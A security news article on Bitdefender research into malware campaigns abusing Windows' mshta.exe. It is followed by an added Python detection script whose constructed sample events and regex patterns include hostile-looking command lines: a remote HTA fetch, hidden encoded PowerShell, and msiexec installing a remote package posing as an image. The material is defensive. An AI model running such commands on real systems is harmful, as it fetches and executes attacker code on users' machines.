Microsoft’s aging “mshta.exe” utility, a leftover component from Internet Explorer, is still being actively abused in modern malware campaigns years after the browser itself was retired.
According to new research from Bitdefender, attackers continue to abuse Microsoft HTML Application Host (MSHTA), a built-in Windows utility capable of executing VBScript and JavaScript from local or remote files.
Despite Internet Explorer reaching end of life in 2022, MSHTA still ships by default on Windows systems and is used as a living-off-the-land binary (LOLBin) to launch malware.
“Even when companies retire legacy products, parts of their ecosystem can persist in Windows for years to support older workflows and enterprise compatibility requirements,” the researchers explained in a blog post. “Threat actors frequently abuse trusted, preinstalled Windows binaries to execute malicious content while relying on software already present on the system.”
Microsoft did not immediately comment on the issue.
Bitdefender researchers observed MSHTA appearing across infection chains associated with commodity stealers such as LummaStealer and Amatera, multi-stage loaders like CountLoader and Emmenhtal Loader, banking trojans including ClipBanker, and even the long-running PurpleFox malware family.
Infections through fake CAPTCHAs, updates
One of the most active clusters analyzed by Bitdefender involved CountLoader, an HTA-based loader that used MSHTA to deliver infections with LummaStealer and Amatera. Attackers relied on fake software downloads, cracked applications, SEO-poisoned websites, and social engineering to lure victims into executing malicious payloads.
Victims downloaded password-protected archives containing legitimate-looking installers. But clicking through them executed a legitimate Python interpreter bundled with malicious scripts that ultimately launched a renamed copy of mshta.exe.
The binary then contacted command-and-control (C2) infrastructure hosting HTA payloads to retrieve the next-stage malware.
“Starting in late February 2026, we observed a new CountLoader domain-hosting pattern,” the researchers noted. “The naming convention remained similar, using domains that imitate legitimate service names, but the infrastructure shifted to .vg and .gl TLDs. Examples include explorer[.]vg, ccleaner[.]gl, and microservice[.]gl.”
Threat actors also ran Emmenhtal Loader campaigns that abused fake CAPTCHA verification pages distributed through Discord phishing messages. Victims were tricked into copying malicious commands into the Windows Run dialog under the pretext of “prove you are human”.
MSHTA executed obfuscated HTA payloads in memory before launching PowerShell to fetch additional malware, ultimately delivering LummaStealer in one analyzed case.
A legacy Windows tool that refuses to die
Bitdefender’s findings suggest MSHTA remains attractive because it checks several boxes attackers care about: it is Microsoft-signed, preinstalled on Windows, capable of in-memory execution, and still implicitly trusted in many environments.
Other sophisticated campaigns picked it up too. Bitdefender detailed PurpleFox using MSHTA to launch ‘msiexec’ commands that downloaded MSI payloads posing as PNG images from remote IP addresses.
PurpleFox, once installed, operates as a rootkit-enabled backdoor capable of persistence, surveillance, information theft, and distributed denial-of-service (DDoS) activity.
Elsewhere, ClipBanker campaigns used HTA loaders to execute Base64-encoded PowerShell commands that established persistence through scheduled tasks posing as legitimate Windows services. The malware ultimately hijacked cryptocurrency wallet addresses copied to victims’ clipboards.
Bitdefender cautioned that not every MSHTA execution is inherently malicious. “A significant portion of detections came from the update mechanism of DriverPack, an older software package that downloads driver files from third-party sources rather than through official Microsoft update channels,” the researchers pointed out.
Still, they argued the balance has clearly shifted toward abuse.
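As an added example, not part of the article or of Bitdefender’s research, the following Python triage logic shows how a defender might separate the chains described above from benign updater noise in process-creation telemetry: a renamed mshta.exe launched from a bundled interpreter (the CountLoader chain), mshta spawning encoded PowerShell (Emmenhtal, ClipBanker), mshta spawning msiexec to pull a remote package named like an image (PurpleFox), and a signed mshta run by a legitimate updater (the DriverPack-style false positive). The records are constructed in Sysmon Event ID 1 style; the field names, the paths, the URLs, the IP address, and the `updater.exe` allowlist entry are all assumptions for illustration, not real indicators.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """One process-creation record (Sysmon Event ID 1 style; field names are assumed)."""
    image: str                 # path of the newly created process
    original_file_name: str    # PE header OriginalFileName, which Sysmon records
    command_line: str
    parent_image: str


MSHTA = "mshta.exe"
# Children that match the chains described in the article when mshta is the parent.
SUSPICIOUS_CHILDREN = {"powershell.exe", "pwsh.exe", "msiexec.exe", "cmd.exe"}
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
# -e / -ec / -enc / -EncodedCommand followed by a Base64 blob of at least 20 chars.
ENCODED_PS_RE = re.compile(r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.IGNORECASE)
USER_PATH_RE = re.compile(r"\\(?:Users\\[^\\]+\\(?:AppData|Downloads|Desktop)|ProgramData|Windows\\Temp)\\", re.IGNORECASE)
INTERPRETERS = {"python.exe", "pythonw.exe"}


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def assess(event: ProcEvent, allowlist: frozenset[str] = frozenset()) -> list[str]:
    """Return the reasons this event looks like MSHTA abuse (empty list = nothing notable)."""
    findings: list[str] = []
    cmd = event.command_line
    child = basename(event.image)
    parent = basename(event.parent_image)

    # Case 1: the event is mshta itself starting. Comparing the on-disk name with the
    # PE OriginalFileName catches renamed copies, which the article says CountLoader used.
    if event.original_file_name.lower() == MSHTA:
        if child != MSHTA:
            findings.append(f"renamed mshta.exe running as {child}")
        if URL_RE.search(cmd):
            findings.append("mshta fetching an HTA from a remote URL")
        if USER_PATH_RE.search(cmd):
            findings.append("mshta command line references a user-writable path")
        if parent in INTERPRETERS:
            findings.append(f"mshta launched by {parent}")

    # Case 2: the event is a child of mshta (HTA handing off to PowerShell or msiexec).
    if parent == MSHTA and child in SUSPICIOUS_CHILDREN:
        findings.append(f"mshta spawned {child}")
        if child in {"powershell.exe", "pwsh.exe"} and ENCODED_PS_RE.search(cmd):
            findings.append("encoded PowerShell command line")
        if child == "msiexec.exe":
            match = URL_RE.search(cmd)
            if match and not match.group(0).lower().endswith(".msi"):
                findings.append("msiexec installing a remote package not named .msi")

    # Benign noise: the article notes DriverPack's updater produced many mshta hits.
    # Only the genuine, un-renamed mshta.exe is suppressed for an allowlisted parent.
    if findings and child == MSHTA and parent in allowlist:
        return []
    return findings


# Constructed sample records. None of these paths, URLs or addresses are real indicators.
SAMPLE_EVENTS = {
    "countloader": ProcEvent(
        image=r"C:\Users\victim\AppData\Local\Temp\svc.exe",
        original_file_name="MSHTA.EXE",
        command_line=r"C:\Users\victim\AppData\Local\Temp\svc.exe http://example.invalid/a.hta",
        parent_image=r"C:\Users\victim\AppData\Local\Temp\python.exe",
    ),
    "emmenhtal": ProcEvent(
        image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        original_file_name="PowerShell.EXE",
        # Base64 blob is constructed filler (UTF-16LE "AAAAAAAAAAAAAAA"), not a payload.
        command_line="powershell.exe -nop -w hidden -enc QQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEA",
        parent_image=r"C:\Windows\System32\mshta.exe",
    ),
    "purplefox": ProcEvent(
        image=r"C:\Windows\System32\msiexec.exe",
        original_file_name="msiexec.exe",
        command_line="msiexec.exe /i http://203.0.113.10/img/logo.png /q",
        parent_image=r"C:\Windows\System32\mshta.exe",
    ),
    "updater_like": ProcEvent(
        image=r"C:\Windows\System32\mshta.exe",
        original_file_name="MSHTA.EXE",
        command_line="mshta.exe http://example.invalid/driverpack/check.hta",
        parent_image=r"C:\Program Files\ExampleUpdater\updater.exe",
    ),
}
# Assumed placeholder for a known-benign updater; DriverPack's real binary name is not on the page.
ALLOWLIST = frozenset({"updater.exe"})


def triage(events: dict[str, ProcEvent], allowlist: frozenset[str] = frozenset()) -> dict[str, list[str]]:
    return {name: assess(event, allowlist) for name, event in events.items()}


if __name__ == "__main__":
    for name, reasons in triage(SAMPLE_EVENTS, ALLOWLIST).items():
        print(f"{name:13} {'ALERT' if reasons else 'ok   '} {'; '.join(reasons)}")
```

The OriginalFileName comparison is what makes the renamed-binary case visible at all: a rule keyed only on the image name `mshta.exe` would miss it, while the parent check catches the PowerShell and msiexec hand-offs even when the HTA itself was executed in memory and never touched disk. The allowlist deliberately suppresses only the genuine, un-renamed mshta.exe, so a renamed copy launched by a trusted parent still alerts.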